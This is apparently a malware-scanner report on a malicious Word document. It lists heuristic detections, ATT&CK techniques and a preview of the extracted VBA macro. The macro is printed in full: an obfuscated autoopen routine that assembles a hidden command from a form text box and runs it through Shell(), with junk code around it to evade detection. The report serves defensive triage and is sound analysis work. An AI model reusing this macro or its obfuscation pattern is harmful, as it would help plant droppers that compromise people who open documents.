MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers a Shell() call, which is highly suspicious and indicative of executing arbitrary commands. Heuristics also indicate suspicious references to cmd.exe and PowerShell, suggesting the macro is used to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Valyria-6786368-0' further supports this dropper functionality.
Heuristics 10
-
ClamAV: Doc.Dropper.Valyria-6786368-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6786368-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
_ .Shell(KtYibDBtM, tjvkwtTXUW), iUSwc) Set LNKkfbuIwvmiIEYLD = RarBNJlzTFIHoMqisWOsB -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() hfBNSWPs -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8564 bytes |
SHA-256: 98d9c877b71a56b71f75935b03042d338d4c451864b954cf3cffd0f0e34601ee |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
238 of 273 identifiers look randomly generated (e.g. 'ViThGSPwrldMKjVcmPlWhija') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TiRPGphXSiJjsk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
hfBNSWPs
End Sub
Attribute VB_Name = "OOhkLcRLiN"
Function hfBNSWPs()
On Error Resume Next
Set BRqzlLOwDAjRnFCDElNicG = bJvlAKvvbQNMtK
Select Case pGUzYGjirbcCpmiMNuPO
Case 261804665
ZOlHFEBZtIsavGKciusfDK = IGJzDARdvqzjGOQAfdR
TJOqXCkMVWImPqcBwGzZc = 205203632
kvaEOStMClcEzrSaBPFIZhNQ = lODZfsFoMiuwzVubJ
Case 42397184
mldJifvJXWXCiJ = CByte(dDpnWtXPmNXdDtKjPbLdiH)
ZtkiiRpbMnIsrlV = ChrW(IPWrwGBrPMqHbWfKVwQum)
pzwlLqvBTvtqDOHQ = Log(SssSVbhApHwXsVb)
End Select
Set ZYcAlRUvsMcTisZVwnqp = WzrBKXCtoAihqXwEvTLMZXJ
Select Case ckKzEFRPMlDZkwatS
Case 14044208
MulsUaQDUidVzq = ZaNEpiiSUFUZTwsStWTw
qspWnBzljPEiHZAjNN = 138243627
cRmABzHcMjwjtJjiXiCh = jlpPrLXsmjJwSsZFoVptU
Case 165884727
QYowqSIfKnsvjz = CByte(KlkjZCoibQJcjMMnQHkYr)
NhadBwKZwsHDLD = ChrW(lzzcqNhjpZSwzcnv)
uIYDJwBpXBUQUfBIifI = Log(wAofAlEiAKzJzjJDiGbDvm)
End Select
Set wtDnIDBBBZAKwSkzCmjQzLiA = wStYIHGWftlcpFkYTD
Select Case zZKZAdrMMvwlODQJkHctRu
Case 260893172
ZwXMjwrfHqCzotsuQ = uaiIXZZwzRqKWDmtACGffPEQ
YATUrPicWzMhRbznkwap = 319270447
zLvtqolPiWSdwYFbIB = hADZLjaIrvTibhE
Case 5672604
YzYurGUqPncYhIn = CByte(jOTvlkJQftUKsqwuYzC)
dOquiivwzjJmjFvS = ChrW(EWooIOzlKwZqiAjFcuRYY)
CpNSvkhimudJTbOW = Log(zsIYkVFPiZhDLduMrT)
End Select
Set LzuZPRLrbQHfBiXEj = dGPsUztPObUOphowzrFE
Select Case qErKmvjbRjDWSFQDSdu
Case 213305627
DkXMbarCfjzbCn = YihDNnwsQrWbYv
NKYanUTzLVoZmDEvQSOf = 240899863
qTMGrHUEwTGwSoDczhFkViYO = pMwGJJQvQTFNjcM
Case 189658054
WVSokPsnShZzbIu = CByte(zCuYwoJqCBUwPTEtIPLDwUEw)
SrcqwpLKPiaREH = ChrW(LclivuYwcjrMzrBcwwTjw)
zGMInzkibDHcrUjVAKttz = Log(EdOTNGcTkbldcfWm)
End Select
Const tjvkwtTXUW = 0
Set ivndosmnivwVZclqpdiGSX = klJAAFSClsrISEaKVQhw
Select Case HuzRiqWWnUVKOCs
Case 200527262
mhQsKdhUSlPSMplbadqKjRP = jwYWwDChjiizjNzRRzQEGDai
joZBUIURVLMFLVOjimiLm = 309701653
fYsmBLodYumPPdjM = KhLBkMGbBUYQrSzobt
Case 189246140
WSGjinLZGwGBaMBEjLv = CByte(mKzqPMjbpaokDkzr)
iTwBhVDOWqfRsEQwQpL = ChrW(PQVHjkfKWwqMJdFswK)
pwbsWBJwWXlnvoY = Log(OzpRwpssYzSHPzYz)
End Select
Set tzavHBKRiJhCwAwtOomhjp = YJvtMfbvGSGziMvETE
Select Case PHVtWRBzPJLrHDiClMIw
Case 247700803
NbjpAQjSkSdDaL = PZbKiMmvbzvDKK
LFrLtuJhRlRwZsOEdTzWmjn = 22500939
bjIpEMWIsGXLORIFsKZRPMC = vSkKnEfRoUSOBrMY
Case 309579775
hlqsOBrQuVOmbOdvumbLVn = CByte(GXtztEAwAWcfQWCDjTW)
JDBtDkFwazjStKkV = ChrW(CwMtWNQzjNZsirswdS)
VAvJwEYDmJlGlj = Log(hUKQmqluUXjDrFrUQriAU)
End Select
Set ickFAzsTSRvQJznqiJAvU = jhjmRCfqbXGnzBr
Select Case wJCirWqMDGTXRiX
Case 218108518
YtDYNhpncpXJWAlwY = rsqPNrTjLjIYtAZY
InhkbMqOjSDhGhYtWjo = 160153290
jMFiWGiEwXjwZdL = aPjzBjYQBECkfWUlzScbbFF
Case 43529561
KjuTjhENBwQIYHzn = CByte(dRDuYaDwwGBjPUJZoqziwS)
zXdZDcbLcomcoCRlJr = ChrW(laDimbHikQCJsKtGXv)
zVWvYudsVWWFom = Log(hwusqwwtquaftSuwtpI)
End Select
Set zkPkGpXiijUaJLlkwicnKf = VXnsuCRlGFkcpOiZEFkmjoG
Select Case zvsmdfqiRptMTwd
Case 207018758
uOUYiwWRJXhZtLjR = swJfIaPFLzUSFIcFYpalj
zWVUIIFYiNvlDiVim = 263827574
TXwBzDPFTUVGfBb = nKoSHAnVHWUEzjqDmjNuCUVQ
Case 292820319
mDIGQjbfiXwVwS = CByte(buciLHjdSUwohwSoXZENj)
AGlcRBTEQiuKaath = ChrW(vCZqmRuujPjavuEAPuVzi)
hKNEPuXWsuqsILJWOoriim = Log(iUopJLfXkwFUPchBAWMXo)
End Select
Set ZAzSzaHSpjjOVuUiwjSoVMUB = RKjUnmDIhSLcDSivKhqXWRDJ
Select Case JzcLaMfzWhQYzB
Case 303494989
GocIGsRnsLfddZAGZTim = zGFffhlOXMjwrQcbAuR
oTPhBTwjJwiXHFIiWcbKf = 169373502
wzhmJXfZYMDmirYiLk = EYiIpmHuEXTGCO
Case 326862846
iUhnJdYFKDTirzwPa = CByte(UwPqrzBdaCEFBXjaqJd)
vazdwlTdDHYDjbtAArdhlfDW = ChrW(FCvzQHpldjuwms)
jYaTiBZZdfZwfwK = Log(XdcsiXfnAiRCvzDOz)
End Select
KtYibDBtM = TiRPGphXSiJjsk.TextBox1 + pwJdpz + MzKXnNfM + vUjCMVRO + bmSBj + pVODfOaj + ojHEWPs + voSLj + skhkjrq + fbBEWZJn + JSChOzv
Set wfIrKQMljFrXXPAPwi = PRhEiwTLXGIKuwURJriAmk
Select Case SMIISiTmjNkXCPbdtrE
Case 271324591
YuwZDwqXUdBfsOsVpBdE = ZzKaRBiOkJhvtuRMjO
cOOjjrKAjIDpbkLwzmwmw = 50436186
kTTkwUaIFmtbELNa = GAzFjTGKivTalcnVFiQQH
Case 79933029
IzwDiJHnkLPfvIEDAMZQ = CByte(HiUJFGzhzKbuUrGiPYB)
IjOWzrNBaPDiwHBRduc = ChrW(HGnBokbRwUkoYo)
XTzLNtwGhGswMqoEV = Log(wTCwNhNQwDGfPJHrdzjiOJJA)
End Select
Set ADDMuvOSqbMlKLlo = WzbBIlVzFqLzICPbwCmO
Select Case hFGbzpJwbSQDmNUlMrS
Case 225805066
pFDTiYwKOJwZDprU = IwLAdXuvWpvqjKUjMrA
HRQNnMJRiiYcQm = 226719338
WMLhIYLjAUiwitrzrQ = rfzMQOdRnRTZzczJz
Case 213549154
vjGhMThKmkrakzTrq = CByte(zuTiGXShuhWjkrRZVik)
ktjDrjwqiZdkHkAlwRdiOfYA = ChrW(FAzJLikGsoGLPnZabwUDlZ)
rfaEFCjFUiPljz = Log(XvtiOvtaiiDHmjDwCfAI)
End Select
Set JdrFiluUvKZtAcIMKVqm = NospDwjFrqGJwsRESlATlki
Select Case sVlRtClHwhwpzQapNPET
Case 122713304
DkrHrkqTJdJPwiLPLoFzM = vcFCLKFWfLKIRAamK
RdYTfjUrdwDPOT = 154597339
oPCpYfNnzwFnRKpZdDhjqb = ViThGSPwrldMKjVcmPlWhija
Case 127906618
imKlnzMSjHFwGUh = CByte(OCnwipIbvUFFPq)
sNzodlFzfzsDOW = ChrW(IQofQimVioijpTsGCqFMkJ)
EPIFIwmmtEGLoRkaXGsS = Log(zCPdnspMIKEwlj)
End Select
YiWsB = Array(fjHDpSPi, rqfFN, bVFzZluCN, Interaction _
_
_
_
_
_
_
_
.Shell(KtYibDBtM, tjvkwtTXUW), iUSwc)
Set LNKkfbuIwvmiIEYLD = RarBNJlzTFIHoMqisWOsB
Select Case YzLiIahBzUTzfuZJAAzfIp
Case 3325502
HanZLBwKkcCrqiAKSRFoopj = JjWNtVhiwUbinIpwXIPDrhTW
oNqjMCRtqQciiR = 96031725
TtVCSXKbHQfadEbPANFHqwm = JpwrNTprAIYowThRD
Case 95094048
vXrPloMiULGDUGCsdaSO = CByte(boZUjnRjfnEcWrvSZLCAoU)
tEDhvaErkzoUiRvFBuwo = ChrW(CbwPHaEOPNzHIjPdFWF)
vTchWMAdGAFqfHrdESn = Log(AcUmpNalfbwYsN)
End Select
Set DJpnmJjIZiJKciKaLJWfIkM = iAzsMLYNSFausKiVZWOriQw
Select Case vDUbBRlSzzImJrvNKwsXDQ
Case 224873300
iBGlWVJOCKzIqw = AUIzuBsLiaBjlYal
VTwAKzwboujztnWNlrDv = 123766945
zlpYLUoXpbYRmWzKpULVFG = MomiSAjXqMhUKKmn
Case 184344633
REHbbAzNaBijziscdkYpVX = CByte(DhFFCpADhjinBCl)
mfEZfpGPzbijCPmR = ChrW(vDtWvzYazBAPurasYmKQzdO)
qFaGTBSzQtGwrprijzh = Log(GAEkIoidbAwSpSjpWRGwjD)
End Select
Set SDBSFfWPmAbjwY = pZpsZnLCrXOUzn
Select Case ppCDftiLQkKaELdBGBbVQAM
Case 161658620
HBJuqKWcsKlhttHGO = HPNGqNWISYRdoddnXrZ
ZZnwMBsTMIUPCbFJC = 8400893
vYiswKOVIEFVPhwz = bPtpVDvJDCbNXUkWhirrh
Case 272963069
wfjPGnFhDcXimHUZUniuHn = CByte(kkUzhDGHzlcvKmo)
WwUXkAlwOMEWDzufKWwilo = ChrW(izUYwKLKnjwLvnPYkw)
kUwjEAqwlonJCibqZQ = Log(pnDCQqEnzsuwOjODCfO)
End Select
Set LMVcpcOiLDXzfw = zfWVRmZwGzsLiHjsJWkhmfF
Select Case GZGjGszpawiHJYDOmPP
Case 187732271
RjabKOduQHRazOrfqqNCCkid = jkSWvXQccpqjHwiTuJoM
MJMiwZCaujBwzadLYVkB = 326404663
ZBziuiiIauQvXaFnzw = ChIpjIVAIWoDLiqk
Case 76083725
NfTrmGGjDDDFkVmnuoQMP = CByte(ZiallrEMjquElSuLuCi)
ERzDlSRYoCTzTn = ChrW(lQBUPbqWMKfkTtj)
OdMWHlXzTajYiWulwMIutiT = Log(OuksGiziFJFWGQwAtBA)
End Select
Set TbZuhiCwScZsPWGKUSnz = SrbGWzARtaSOjvQLLVTBCNK
Select Case pjurLvfCqoAkwnLiCi
Case 164633403
HijapzJzUwoFjF = mFJGwuPXsufMXJlwY
IOLATBLliiuAvDsXZcsXaH = 294470251
qjJnlnizPQYrFlm = vMLjdrwcTAkIFAO
Case 7262653
EJnrYAvAwkffBRnqkc = CByte(vMdzhhTkDarPCXWA)
zQXMQfjGTwSiwRUXAFI = ChrW(KFJEPrZEUcIfRLrUEBi)
wsNkBCGIXsBRNYRtGSwZ = Log(cmronRlZASwabfS)
End Select
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.